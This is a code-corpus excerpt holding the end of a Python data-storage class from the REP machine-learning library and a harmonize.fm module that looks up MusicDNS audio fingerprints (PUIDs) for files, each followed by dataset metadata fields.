:return: count of rows in storage
:rtype: int
"""
return len(self.data)
def get_data(self, features=None):
"""
Get data for estimator
:param features: set of feature names (if None then use all features in data storage)
:type features: None or list[str]
:rtype: pandas.DataFrame
"""
df = get_columns_in_df(self.data, features)
if self.shuffle:
return df.irow(self.get_indices())
return df
def get_targets(self):
"""
Get sample targets for estimator
:rtype: numpy.array
"""
if self.shuffle:
return self.target[self.get_indices()]
return self.target
def get_weights(self, allow_nones=False):
"""
Get sample weights for estimator
:rtype: numpy.array
"""
if self.sample_weight is None:
if allow_nones:
return self.sample_weight
else:
return numpy.ones(len(self.data))
else:
if self.shuffle:
return self.sample_weight[self.get_indices()]
return self.sample_weight
def get_indices(self):
"""
Get data indices
:rtype: numpy.array
"""
if self._indices is None:
rs = RandomState(seed=self._random_state)
self._indices = rs.permutation(len(self))
return self._indices
def col(self, index):
"""
Get necessary columns
:param index: names
:type index: None or str or list(str)
:rtype: pandas.Series or pandas.DataFrame
"""
if isinstance(index, str):
name = list(get_columns_dict([index]).keys())[0]
return self.get_data([index])[name]
return self.get_data(index)
def eval_column(self, expression):
"""
Evaluate some expression to get necessary data
:type expression: numbers.Number or array-like or str or function(pandas.DataFrame)
:rtype: numpy.array
"""
if isinstance(expression, numbers.Number):
return numpy.zeros(len(self), dtype=type(expression)) + expression
elif isinstance(expression, str):
return numpy.array(self.col(expression))
elif hasattr(expression, '__call__'):
return numpy.array(expression(self.get_data()))
else:
assert len(expression) == len(self), 'Different length'
return numpy.array(expression)
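# Illustrative usage (not part of the original module; because of the relative
# imports above, run this from code that imports rep.data.storage):
#
#     import pandas
#     from rep.data.storage import LabeledDataStorage
#     df = pandas.DataFrame({'x': [1.0, 2.0, 3.0], 'y': [0, 1, 0]})
#     lds = LabeledDataStorage(df, target='y', sample_weight=2.0, random_state=42)
#     lds.get_data(['x'])    # feature DataFrame
#     lds.get_targets()      # array([0, 1, 0])
#     lds.get_weights()      # array([2., 2., 2.])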
| apache-2.0 | -9,111,050,701,465,696,000 | 32.656051 | 119 | 0.609008 | false |
JustinTulloss/harmonize.fm | fileprocess/fileprocess/actions/puidgenerator.py | 1 | 1905 | import logging
import os
import subprocess
from baseaction import BaseAction
from fileprocess.processingthread import na
from fileprocess.configuration import config
try:
import musicdns
except ImportError:
musicdns = None
import fileprocess
log = logging.getLogger(__name__)
class PuidGenerator(BaseAction):
def __init__(self, *args, **kwargs):
global musicdns
super(PuidGenerator, self).__init__(*args, **kwargs)
if musicdns:
musicdns.initialize()
def can_skip(self, new_file):
if new_file.get('puid'):
return True
else:
return False
def process(self, file):
global musicdns
if not musicdns:
return file
if file.get('puid'):
return file
if not file.has_key('fname'):
return file
if not os.path.exists(file['fname']):
return file
try:
fp = musicdns.create_fingerprint(file['fname'])
puid = musicdns.lookup_fingerprint(fp[0], fp[1], config['musicdns.key'])
except Exception, e:
log.warn("Could not fingerprint %s: %s", file['fname'], e)
            return file  # We don't need the fingerprint per se
log.debug('%s has puid %s', file.get('title'), puid)
if puid != None:
file['puid'] = puid
return file
else:
# Spin off a process to do the analysis, we don't care if it
# succeeds or fails, we're just helping out MusicDNS
try:
gp = subprocess.Popen(
['genpuid', config['musicdns.key'], '-xml',
os.path.abspath(file['fname'])],
stdout=open('/dev/null')
)
except Exception, e:
log.info("Could not generate puid: %s", e)
return file
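# Illustrative usage (not part of the original module; BaseAction's constructor
# is assumed to accept no extra arguments here):
#
#     action = PuidGenerator()
#     tags = action.process({'fname': '/tmp/song.mp3', 'title': 'Song'})
#     tags.get('puid')  # None if musicdns is unavailable or the lookup failed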
| mit | -1,684,215,555,034,553,600 | 27.863636 | 84 | 0.548556 | false |